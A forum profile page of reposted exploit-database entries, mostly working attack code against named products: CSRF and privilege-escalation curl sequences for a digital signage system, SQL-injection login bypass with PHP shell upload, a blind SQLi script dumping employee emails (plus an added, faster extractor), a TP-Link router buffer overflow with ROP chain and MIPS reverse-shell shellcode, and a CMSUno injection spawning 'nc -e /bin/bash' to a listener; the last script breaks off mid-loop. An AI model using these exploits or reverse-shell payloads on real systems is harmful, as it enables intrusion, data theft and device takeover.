HireHackking
Everything posted by HireHackking

  1. # Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
     # Date: 2020-07-16
     # Exploit Author: LiquidWorm
     # Vendor Homepage: http://www.yerootech.com
     # Version: 6.2

     iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)

     Vendor: Guangzhou Yeroo Tech Co., Ltd.
     Product web page: http://www.yerootech.com
     Affected version: V6.2 B2014.12.12.1220
                       V5.6 B2017.07.12.1757
                       V4.3

     Summary: iDS6 Software's DSSPro network digital signage management system is a
     web-based server software solution for Windows.

     Desc: The application interface allows users to perform certain actions via HTTP
     requests without performing any validity checks to verify the requests. This can
     be exploited to perform certain actions with administrative privileges if a
     logged-in user visits a malicious web site.

     Tested on: Microsoft Windows XP
                Microsoft Windows 7
                Microsoft Windows Server 2008
                Microsoft Windows Server 2012
                Microsoft Windows 10
                Apache Tomcat/8.0.44
                Apache Tomcat/6.0.35
                Apache-Coyote/1.1
                Apache Axis/1.4
                MySQL 5.5.25
                Java 1.8.0

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2020-5606
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php

     16.07.2020

     --

     Add user:
     ---------

     <html>
       <body>
         <form action="http://192.168.1.88/Pages/user!addUser" method="POST">
           <input type="hidden" name="user.userName" value="testingus" />
           <input type="hidden" name="user.password" value="zeroscience" />
           <input type="submit" value="add()" />
         </form>
       </body>
     </html>
  2. # Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
     # Date: 4-11-2020
     # Exploit Author: mosaaed
     # Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
     # Version: 1.0
     # Tested on: Parrot 5.5.17 + Apache 2.4.46

     # replace shell.php with your own php reverse shell
     # change [TARGET URL] to target URL or IP address
     # setup your netcat listener for sum good ol shellz

     #!/usr/bin/python3
     import requests
     import time

     def sqli_admin():
         # Login bypass: the injected username closes the quoted string and the '#' comments out the password check
         s = requests.Session()
         data = {"username": "admin'or'1'=1#", "password": "mosaaed"}
         adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
         s.post(adminlogin, data=data)
         return s

     def trigger_rce(session):
         # The upload is saved as <unix timestamp>_<original name>, so remember the time before uploading
         starttime = int(time.time())
         multipart_form_data = {
             "name": "cyberscurity",
             "email": "test@test.com",
             "contact": "+11111111111",
             "about": "attack",
             "img": ("shell.php", open("shell.php", "rb"))
         }
         session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
         get_shell(starttime - 100, starttime + 100, session)

     def get_shell(start, end, session):
         # Walk the timestamp window around the upload time until the uploaded shell answers
         for i in range(start, end):
             session.get("http://localhost/sta/assets/uploads/" + str(i) + "_shell.php")
             response = requests.get("http://localhost/sta/assets/uploads/" + str(i) + "_shell.php")
             if response.status_code == 200:
                 print("http://localhost/sta/assets/uploads/" + str(i) + "_shell.php")

     def main():
         session = sqli_admin()
         trigger_rce(session)

     if __name__ == '__main__':
         main()
  3. # Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
     # Date: 2020-07-16
     # Exploit Author: LiquidWorm
     # Vendor Homepage: http://www.yerootech.com
     # Version: 6.2

     iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass

     Vendor: Guangzhou Yeroo Tech Co., Ltd.
     Product web page: http://www.yerootech.com
     Affected version: V6.2 B2014.12.12.1220
                       V5.6 B2017.07.12.1757
                       V4.3

     Summary: iDS6 Software's DSSPro network digital signage management system is a
     web-based server software solution for Windows.

     Desc: The CAPTCHA function for DSSPro is prone to a security bypass vulnerability
     that occurs in the CAPTCHA authentication routine. By requesting the
     autoLoginVerifyCode object an attacker can receive a JSON message code and
     successfully bypass the CAPTCHA-based authentication challenge and perform
     brute-force attacks.

     Tested on: Microsoft Windows XP
                Microsoft Windows 7
                Microsoft Windows Server 2008
                Microsoft Windows Server 2012
                Microsoft Windows 10
                Apache Tomcat/8.0.44
                Apache Tomcat/6.0.35
                Apache-Coyote/1.1
                Apache Axis/1.4
                MySQL 5.5.25
                Java 1.8.0

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2020-5607
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php

     16.07.2020

     --

     Get CAPTCHA code:
     -----------------

     $ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt
     {"success":true,"message":"6435","data":"6435"}

     Use CAPTCHA code:
     -----------------

     $ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v
     HTTP/1.1 200 OK
     Server: Apache-Coyote/1.1
     Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
     Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
     Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
     Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
     Cache-Control: no-cache
     Pragma: no-cache
     Content-Type: application/x-json;charset=UTF-8
     Date: Tue, 21 Jul 2020 19:41:26 GMT
     Connection: close
     Content-Length: 16

     {"success":true}
  4. # Exploit Title: Amarok 2.8.0 - Denial-of-Service
     # Date: 1 November 2020
     # Exploit Author: FishballAndMeatball
     # Vendor Homepage: https://amarok.kde.org/
     # Software link: https://community.kde.org/Amarok/GettingStarted/Download
     # Version: Amarok 2.8.0
     # Tested on: Windows 10, Windows 7, Windows XP
     # CVE: CVE-2020-13152

     # Writes a playlist made of a single 6368545-byte run of 'A'; opening it in Amarok triggers the crash
     my $file = "test_big.m3u";
     my $junk = "\x41" x 6368545;
     open(my $FILE, '>', $file) or die "cannot write $file: $!";
     print $FILE "$junk";
     close($FILE);
     print "m3u File Created successfully\n";
  5. # Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
     # Date: 2020-07-16
     # Exploit Author: LiquidWorm
     # Vendor Homepage: http://www.yerootech.com
     # Version: 6.2

     iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation

     Vendor: Guangzhou Yeroo Tech Co., Ltd.
     Product web page: http://www.yerootech.com
     Affected version: V6.2 B2014.12.12.1220
                       V5.6 B2017.07.12.1757
                       V4.3

     Summary: iDS6 Software's DSSPro network digital signage management system is a
     web-based server software solution for Windows.

     Desc: The application suffers from a privilege escalation vulnerability. An
     authenticated user can elevate his/her privileges by calling JS functions from
     the console or by insecure direct object references to hidden functionalities
     that can result in creating users, modifying roles and permissions and full
     takeover of the application.

     Tested on: Microsoft Windows XP
                Microsoft Windows 7
                Microsoft Windows Server 2008
                Microsoft Windows Server 2012
                Microsoft Windows 10
                Apache Tomcat/8.0.44
                Apache Tomcat/6.0.35
                Apache-Coyote/1.1
                Apache Axis/1.4
                MySQL 5.5.25
                Java 1.8.0

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2020-5608
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php

     16.07.2020

     --

     --------------------
     Default credentials:
     --------------------

     admin:123456 (id: n/k, access: /admin)
     boss:boss (id: 100001, access: /)
     user:user (id: 100002, access: /)

     ----------------------------
     Once logged-in, create user:
     ----------------------------

     In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action)
     Type: add()

     or issue a POST request:

     $ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"

     --------------
     List user IDs:
     --------------

     $ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"

     ------------
     Create role:
     ------------

     In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action):
     Type: add()

     or issue a POST request:

     $ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"

     --------------
     List role IDs:
     --------------

     $ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"

     ------------------------------------------
     Apply all permissions to the created role:
     ------------------------------------------

     $ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53"

     ------------------------------------
     Assign created role to created user:
     ------------------------------------

     $ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"

     ------------
     Delete user:
     ------------

     In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username:
     Type: del()

     or issue a POST request:

     $ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
  6. # Exploit Title: SmartBlog 2.0.1 - 'id_post' Blind SQL injection
     # Date: 2020-11-05
     # Exploit Author: C0wnuts
     # Vendor Homepage: https://github.com/smartdatasoft/smartblog
     # Version: 2.0.1
     # Tested on: Linux
     # Description: A blind SQL injection is present in the "id_post" parameter of the "details" controller. It allows you to extract information from the database by means of successive character tests.

     # POC:
     # -------------------------
     # http://localhost/[script_path]/index.php?fc=module&module=smartblog&id_post=<valid post number> or {SQL}&controller=details
     # -------------------------
     # Example:
     # 1. Test if the first character of the database name is "t":
     # http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring(DATABASE(),1,1)='t'&controller=details
     # 2. Test if the first character of the email of the first account is "a":
     # http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring((SELECT email FROM ps_employee LIMIT 1 offset 0),1,1)='a'&controller=details
     # -------------------------
     # Script PYTHON (python 3)

     import requests, string
     from requests.adapters import HTTPAdapter
     from requests.packages.urllib3.util.retry import Retry

     initialUrl = 'https://localhost.com/index.php?fc=module&module=smartblog&id_post=4329824944'
     endOfUrl = '&controller=details'
     # Change this to http:// if the website is not served over https
     protocol = "https://"
     offset = 0
     endData = 0
     end = 0
     iteration = 0
     charList = string.printable
     # The character returned by the db when you reach the end of the extracted information. In my case that was "+" but it can be "\", or " " or whatever. /!\ Just test and change this value according to your needs /!\
     endChar = "+"
     # The length of the page when the SQLi failed. In my case that was 16094. If the length of the content of the page is higher than this value, the character tested is the right one. /!\ Just test and change this value according to your needs /!\
     FailPageLen = 17000
     # MySQL is not case sensitive, but if the db used by the website is case sensitive remove the following line
     charList = charList.replace("ABCDEFGHIJKLMNOPQRSTUVWXYZ", "")

     # One session with a retry policy, reused for every request
     # (urllib3 1.26 renamed method_whitelist to allowed_methods; use that name on newer versions)
     retry_strategy = Retry(total=30, backoff_factor=0.2, method_whitelist=["GET", "POST"])
     adapter = HTTPAdapter(max_retries=retry_strategy)
     http = requests.Session()
     http.mount(protocol, adapter)

     while endData == 0:
         contentInfo = ""
         iteration = 0
         end = 0
         while end == 0:
             iteration = iteration + 1
             for elem in charList:
                 url = initialUrl
                 # This request gets the email of every employee. Replace the request by whatever you want, but keep in mind that the script extracts information one character at a time, so you need to keep '+str(offset)+' and substring(,'+str(iteration)+',1). "elem" is the character tested (inserted as-is, not URL-encoded)
                 request = '%20or%20substring((SELECT%20email%20FROM%20ps_employee%20LIMIT%201%20offset%20' + str(offset) + '),' + str(iteration) + ',1)=%27' + elem + '%27'
                 url += request + endOfUrl
                 response = http.get(url)
                 if len(response.content) > FailPageLen:
                     print(contentInfo)
                     if elem == endChar:
                         end = 1
                         if contentInfo == "":
                             endData = 1
                     else:
                         contentInfo = contentInfo + elem
                     break
             else:
                 # No candidate matched at this position: stop instead of looping forever
                 print("no character in charList matched at position " + str(iteration))
                 end = 1
                 endData = 1
         print(contentInfo)
         offset = offset + 1
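The script above tests every printable character one request at a time, roughly 90 requests per extracted character. The following is an added example, not part of C0wnuts' post: the same boolean oracle (page longer than the failure length means the injected condition was true), but each character is recovered by binary search on its code point, and the string length is recovered first so no end marker is needed. It runs offline against a constructed in-memory SQLite stand-in for the shop database (only the two tables the attack touches, with made-up rows); the non-existent id_post value is the one the post uses. SQLite's unicode()/substr() correspond to MySQL's ord()/substring(), which is the only change needed to point it at the real target.

```python
import sqlite3

MISSING_ID = "4329824944"   # a post id that does not exist, as in the post's own URL


def make_db():
    """Constructed stand-in for the PrestaShop database: only the tables the attack touches."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE smartblog_post (id_post INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO smartblog_post VALUES (1, 'first post');
        CREATE TABLE ps_employee (id_employee INTEGER PRIMARY KEY, email TEXT);
        INSERT INTO ps_employee VALUES (1, 'admin@example.com');
        INSERT INTO ps_employee VALUES (2, 'Ops.Lead@example.com');
    """)
    return db


class Oracle:
    """The boolean side channel: True when the page renders a post (longer body), False otherwise."""

    def __init__(self, db):
        self.db = db
        self.calls = 0          # stands in for the number of HTTP requests sent

    def __call__(self, condition: str) -> bool:
        self.calls += 1
        # The vulnerable controller concatenates id_post straight into the WHERE clause;
        # with a non-existent id the row set depends only on the injected condition.
        sql = "SELECT title FROM smartblog_post WHERE id_post = " + MISSING_ID + " or " + condition
        return self.db.execute(sql).fetchone() is not None


def bsearch(greater, lo: int, hi: int) -> int:
    """Find v in [lo, hi] given an oracle that answers 'is the secret > n'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, expr: str, max_len: int = 64) -> str:
    """Recover the string value of a SQL expression: length first, then one code point per position."""
    length = bsearch(lambda n: oracle(f"length({expr}) > {n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # 7 requests per character for the 7-bit range instead of one per candidate
        code = bsearch(lambda n: oracle(f"unicode(substr({expr}, {pos}, 1)) > {n}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


def dump_column(oracle, column: str, table: str, limit: int = 50) -> list:
    """Walk the rows with LIMIT 1 OFFSET n; a missing row yields NULL, length 0, and ends the loop."""
    rows = []
    for offset in range(limit):
        value = extract(oracle, f"(SELECT {column} FROM {table} LIMIT 1 OFFSET {offset})")
        if not value:
            break
        rows.append(value)
    return rows


if __name__ == "__main__":
    oracle = Oracle(make_db())
    for email in dump_column(oracle, "email", "ps_employee"):
        print(email)
    print(f"{oracle.calls} oracle requests")
```

Against the live target the Oracle body becomes one GET with the condition URL-encoded into id_post and the `len(response.content) > FailPageLen` test from the script above; everything else stays the same. The length-first approach also removes the case-sensitivity workaround, since no character set has to be guessed.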
  7. # Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated)
     # Date: 2020-08-28
     # Exploit Author: Patrik Lantz
     # Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/
     # Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router
     # Tested on: Firmware version 3.13.33 and 3.14.3
     # CVE : CVE-2017-13772

     #!/usr/bin/python3
     import sys
     import hashlib
     import base64
     import requests
     import socket

     """
     RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772.
     Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1

     Usage:
     1) Start listener on attacker machine: nc -nlvvp 31337
     2) Execute script: python exploit.py <attacker_ip>
     """

     def main(argv):
         if len(sys.argv) < 2:
             print("Usage: python exploit.py <attacker_ip>")
             sys.exit(1)

         password = "admin"
         target = "192.168.0.1:80"
         attacker_ip = sys.argv[1]
         # The four raw bytes of the attacker address become lui/ori immediates inside the shellcode
         ip = socket.inet_aton(attacker_ip)
         if 0x00 in ip or 0x20 in ip:
             print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.")
             sys.exit(1)

         url = "http://" + target + "/"
         try:
             r = requests.get(url=url)
         except requests.RequestException:
             print("[-] Could not connect to target: " + target)
             sys.exit(1)

         if 'WWW-Authenticate' in r.headers.keys():
             if not 'WDR4300' in r.headers['WWW-Authenticate']:
                 print("[-] This is not TP-Link WDR4300 (N750)")
                 sys.exit(1)
         else:
             print("[-] This does not seem to be the web interface of a router!")

         # Newer firmware: the Authorization cookie carries base64(admin:md5(password))
         credentials = "admin" + ":" + hashlib.md5(password.encode()).hexdigest()
         auth = base64.b64encode(credentials.encode()).decode()
         url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save"
         print("[+] Setting target to: " + target)
         print("[+] Using default admin password: " + password)
         print("[+] Cookie set to: Authorization=Basic%20" + auth)
         h = {}
         h["Cookie"] = "Authorization=Basic%20" + auth
         h['Upgrade-Insecure-Requests'] = '1'
         h['Referer'] = 'http://' + target + '/'
         r = requests.get(url=url, headers=h)
         data = r.text
         if "httpAutErrorArray" in data:
             print('[-] Could not login to the admin interface')
             sys.exit(1)

         older_fw = False  # older firmware, e.g., 3.13.33
         if "<TITLE>Login Incorrect</TITLE>" in data:
             print("[-] Incorrect login, perhaps an older firmware? Sending digest authentication using the Authorization header instead..")
             credentials = "admin:" + password
             auth = base64.b64encode(credentials.encode()).decode()
             url = "http://" + target + "/"
             h = {}
             h["Authorization"] = "Basic%20" + auth
             h['Upgrade-Insecure-Requests'] = '1'
             h['Referer'] = 'http://' + target + '/'
             r = requests.get(url=url, headers=h)
             data = r.text
             if 'window.parent.location.href' not in data:
                 print("[-] Failed to login to the admin interface")
                 sys.exit(1)
             print('[+] Older firmware confirmed, successfully logged in')
             older_fw = True

         authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"', '')
         unique_id = ''
         if not older_fw:
             unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/'
             print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/', ''))

         # now we deliver the exploit payload via a GET request
         h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm'

         # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
         nopsled = b"\x26\x40\x08\x01" * 12

         # identified bad characters: 0x20,0x00
         # Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541
         buf = b""
         buf += b"\x24\x0f\xff\xfa"  # li $t7, -6
         buf += b"\x01\xe0\x78\x27"  # nor $t7, $zero
         buf += b"\x21\xe4\xff\xfd"  # addi $a0, $t7, -3
         buf += b"\x21\xe5\xff\xfd"  # addi $a1, $t7, -3
         buf += b"\x28\x06\xff\xff"  # slti $a2, $zero, -1
         buf += b"\x24\x02\x10\x57"  # li $v0, 4183 ( sys_socket )
         buf += b"\x01\x01\x01\x0c"  # syscall 0x40404
         buf += b"\xaf\xa2\xff\xff"  # sw $v0, -1($sp)
         buf += b"\x8f\xa4\xff\xff"  # lw $a0, -1($sp)
         buf += b"\x34\x0f\xff\xfd"  # li $t7, -3 ( sa_family = AF_INET )
         buf += b"\x01\xe0\x78\x27"  # nor $t7, $zero
         buf += b"\xaf\xaf\xff\xe0"  # sw $t7, -0x20($sp)
         buf += b"\x3c\x0e\x7a\x69"  # lui $t6, 0x7a69 ( sin_port = 0x7a69 )
         buf += b"\x35\xce\x7a\x69"  # ori $t6, $t6, 0x7a69
         buf += b"\xaf\xae\xff\xe4"  # sw $t6, -0x1c($sp)
         buf += b"\x3c\x0e" + ip[0:2]  # lui $t6, 0xAABB ( sin_addr = 0xAABB ...
         buf += b"\x35\xce" + ip[2:4]  # ori $t6, $t6, 0xCCDD ... 0xCCDD
         buf += b"\xaf\xae\xff\xe6"  # sw $t6, -0x1a($sp)
         buf += b"\x27\xa5\xff\xe2"  # addiu $a1, $sp, -0x1e
         buf += b"\x24\x0c\xff\xef"  # li $t4, -17 ( addrlen = 16 )
         buf += b"\x01\x80\x30\x27"  # nor $a2, $t4, $zero
         buf += b"\x24\x02\x10\x4a"  # li $v0, 4170 ( sys_connect )
         buf += b"\x01\x01\x01\x0c"  # syscall 0x40404
         buf += b"\x24\x0f\xff\xfd"  # li t7,-3
         buf += b"\x01\xe0\x28\x27"  # nor a1,t7,zero
         buf += b"\x8f\xa4\xff\xff"  # lw $a0, -1($sp)
         buf += b"\x24\x02\x0f\xdf"  # li $v0, 4063 ( sys_dup2 )
         buf += b"\x01\x01\x01\x0c"  # syscall 0x40404
         buf += b"\x24\xa5\xff\xff"  # addi a1,a1,-1 (\x20\xa5\xff\xff)
         buf += b"\x24\x01\xff\xff"  # li at,-1
         buf += b"\x14\xa1\xff\xfb"  # bne a1,at, dup2_loop
         buf += b"\x28\x06\xff\xff"  # slti $a2, $zero, -1
         buf += b"\x3c\x0f\x2f\x2f"  # lui $t7, 0x2f2f
         buf += b"\x35\xef\x62\x69"  # ori $t7, $t7, 0x6269
         buf += b"\xaf\xaf\xff\xec"  # sw $t7, -0x14($sp)
         buf += b"\x3c\x0e\x6e\x2f"  # lui $t6, 0x6e2f
         buf += b"\x35\xce\x73\x68"  # ori $t6, $t6, 0x7368
         buf += b"\xaf\xae\xff\xf0"  # sw $t6, -0x10($sp)
         buf += b"\xaf\xa0\xff\xf4"  # sw $zero, -0xc($sp)
         buf += b"\x27\xa4\xff\xec"  # addiu $a0, $sp, -0x14
         buf += b"\xaf\xa4\xff\xf8"  # sw $a0, -8($sp)
         buf += b"\xaf\xa0\xff\xfc"  # sw $zero, -4($sp)
         buf += b"\x27\xa5\xff\xf8"  # addiu $a1, $sp, -8
         buf += b"\x24\x02\x0f\xab"  # li $v0, 4011 (sys_execve)
         buf += b"\x01\x01\x01\x0c"  # syscall 0x40404

         shellcode = nopsled + buf

         """
         We control $ra, $s0 and $s1 via the buffer overflow.

         libc_base: 0x2aae2000

         First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974

         0x0004c97c      move t9, s0
         0x0004c980      lw ra, (var_1ch)
         0x0004c984      lw s0, (var_18h)
         0x0004c988      addiu a0, zero, 2       ; arg1
         0x0004c98c      addiu a1, zero, 1       ; arg2
         0x0004c990      move a2, zero
         0x0004c994      jr t9

         sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0

         This gadget calls sleep, in this gadget we also set the return address to the
         second ROP gadget which is controlled by setting appropriate value on the stack
         location 0x1c($sp), i.e., the first value on the stack, due to the instruction
         at 0x0004c980.

         Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8

         0x00039fa8      addiu s0, sp, 0x28
         0x00039fac      move a0, s3
         0x00039fb0      move a1, s0
         0x00039fb4      move t9, s1
         0x00039fb8      jalr t9

         This gadget will set s0 to point our shellcode on the stack, that must be
         located at sp+0x28. Then as we control s1, we jump to the last and third ROP
         gadget.

         Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8

         0x000406d8      move t9, s0
         0x000406dc      jalr t9

         Jump to the shellcode pointed in s0.
         """

         sleep_addr = b"\x2a\xb3\x5c\xa0"
         sleep_gadget = b"\x2a\xb2\xe9\x74"
         stack_gadget = b"\x2a\xb1\xbf\xa8"
         call_gadget = b"\x2a\xb2\x26\xd8"
         junk = b"J" * 28
         payload = b"A" * 160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode

         p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize': 64, 'overTime': '800', 'trHops': '20'}
         url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm"
         print("[+] Delivering exploit payload to: " + url)
         try:
             r = requests.get(url=url, params=p, headers=h, timeout=10)
         except requests.RequestException:
             print("[+] Finished delivering exploit")

     if __name__ == "__main__":
         main(sys.argv[1:])
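The exploit only screens the four attacker-IP bytes for the 0x00/0x20 bad characters, and the stack arithmetic behind "shellcode at sp+0x28" is left to the reader. The block below is an added example, not Patrik Lantz's code: it rebuilds the same payload layout from the exploit's own constants (libc base, gadget offsets, 160 bytes of padding, 28 bytes of junk, 12-instruction sled), scans the whole payload for bad characters, and checks that the stack gadget's sp+0x28 really lands inside the NOP sled. The shellcode body is a constructed stub (sled plus the sin_port and sin_addr instructions) standing in for the full reverse shell above; the assumption that the post-epilogue $sp points at the junk bytes is the one the exploit itself makes with its lw ra, 0x1c($sp).

```python
import socket

BAD_CHARS = {0x00, 0x20}          # bad characters identified in the exploit
LIBC_BASE = 0x2aae2000
SLEEP_ADDR = LIBC_BASE + 0x00053ca0     # 0x2ab35ca0, goes into $s0
SLEEP_GADGET = LIBC_BASE + 0x0004c974   # 0x2ab2e974, goes into $ra
STACK_GADGET = LIBC_BASE + 0x00039fa8   # 0x2ab1bfa8, read by the sleep gadget from 0x1c($sp)
CALL_GADGET = LIBC_BASE + 0x000406d8    # 0x2ab226d8, goes into $s1

NOP = b"\x26\x40\x08\x01"         # xor $t0,$t0,$t0: a NOP with no null bytes
PAD = 160                         # bytes before the saved $s0
JUNK = 28                         # 0x1c bytes between the post-epilogue $sp and the second $ra
SLED = 12                         # NOPs in the sled, as in the exploit


def be32(addr: int) -> bytes:
    return addr.to_bytes(4, "big")  # the router CPU is big-endian MIPS


def sin_addr_instructions(ip: str) -> bytes:
    """lui $t6, hi16 / ori $t6, $t6, lo16 with the attacker address split across the immediates."""
    raw = socket.inet_aton(ip)
    return b"\x3c\x0e" + raw[0:2] + b"\x35\xce" + raw[2:4]


def shellcode_stub(ip: str) -> bytes:
    """Constructed stand-in: sled, sin_port = 0x7a69 (31337) as in the exploit, then sin_addr."""
    return NOP * SLED + b"\x3c\x0e\x7a\x69" + b"\x35\xce\x7a\x69" + sin_addr_instructions(ip)


def build_payload(shellcode: bytes) -> bytes:
    """Same order as the exploit: pad | $s0 | $s1 | $ra | junk | second $ra | shellcode."""
    return (b"A" * PAD + be32(SLEEP_ADDR) + be32(CALL_GADGET) + be32(SLEEP_GADGET)
            + b"J" * JUNK + be32(STACK_GADGET) + shellcode)


def layout() -> dict:
    """Byte offsets into the payload; $sp after the overflowed function's epilogue points at the junk."""
    sp = PAD + 12
    return {
        "s0": PAD, "s1": PAD + 4, "ra": PAD + 8,
        "sp": sp,
        "second_ra": sp + 0x1c,                 # lw ra, 0x1c($sp) in the sleep gadget
        "shellcode": sp + 0x1c + 4,
        "jump_target": sp + 0x28,               # addiu s0, sp, 0x28 in the stack gadget
        "sled_end": sp + 0x1c + 4 + len(NOP) * SLED,
    }


def jump_lands_in_sled() -> bool:
    l = layout()
    return l["shellcode"] <= l["jump_target"] < l["sled_end"]


def find_bad_chars(blob: bytes) -> list:
    """(offset, byte) for every bad character anywhere in the payload, gadget addresses included."""
    return [(i, b) for i, b in enumerate(blob) if b in BAD_CHARS]


if __name__ == "__main__":
    for ip in ("192.168.1.100", "10.0.0.5"):
        bad = find_bad_chars(build_payload(shellcode_stub(ip)))
        print(ip, "clean" if not bad else f"bad bytes at {bad}")
    print(layout(), "jump lands in sled:", jump_lands_in_sled())
```

With the exploit's constants the jump lands 8 bytes into the 48-byte sled, which is why the sled is load-bearing and not decoration; shrink it below three instructions and the stack gadget hands control to the middle of the socket setup.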
  8. # Exploit Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
     # Google Dork: N/A
     # Date: 2020.09.30
     # Exploit Author: Fatih Çelik
     # Vendor Homepage: https://github.com/boiteasite/cmsuno/
     # Software Link: https://github.com/boiteasite/cmsuno/
     # Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
     # Version: 1.6.2
     # Tested on: Kali Linux 2020.2

     import requests
     from bs4 import BeautifulSoup
     import lxml

     username = input("username: ")
     password = input("password: ")
     root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
     listener_ip = input("Your ip: ")
     listener_port = input("Your port for reverse shell: ")

     login_url = root_url + "/uno.php"
     vulnerable_url = root_url + "/uno/central.php"

     session = requests.Session()
     request = session.get(login_url)

     # Get the unox value
     soup = BeautifulSoup(request.text, "lxml")
     unox = soup.find("input", {'name': 'unox'})['value']

     # Login
     body = {"unox": unox, "user": username, "pass": password}
     session.post(login_url, data=body)

     # Get the second unox value
     request = session.get(login_url)
     unox = soup.find("input", {'name': 'unox'})['value']

     # Exploit
     header = {
         "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
         "Accept": "*/",
         "Accept-Encoding": "gzip, deflate",
         "X-Requested-With": "XMLHttpRequest",
         "Origin": login_url,
         "Connection": "close",
         "Referer": login_url
     }
     # The lang value closes the quoted string it is written into and appends a system() call
     payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip, listener_port)

     while True:
